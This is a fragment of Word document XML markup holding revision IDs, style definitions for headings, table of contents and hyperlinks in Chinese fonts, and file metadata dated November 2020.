    <w:rsid w:val="6D5F201D"/>
    <w:rsid w:val="6E511BD0"/>
    <w:rsid w:val="6F3B67CA"/>
    <w:rsid w:val="6FCE7611"/>
    <w:rsid w:val="707D2058"/>
    <w:rsid w:val="707E1519"/>
    <w:rsid w:val="740367D2"/>
    <w:rsid w:val="742614F8"/>
    <w:rsid w:val="78EF662B"/>
    <w:rsid w:val="7DCB7922"/>
    <w:rsid w:val="7EA61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0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:bidi="ar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1"/>
      </w:numPr>
      <w:spacing w:before="14"/>
      <w:ind w:left="575" w:hanging="575"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US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1"/>
      </w:numPr>
      <w:ind w:left="720" w:hanging="720"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:sz w:val="30"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="en-US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semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="1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1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1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5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="14"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="17">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="1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8">
    <w:name w:val="标题 1 字符"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32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2020-11-02T02:58:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-02T08:46:25Z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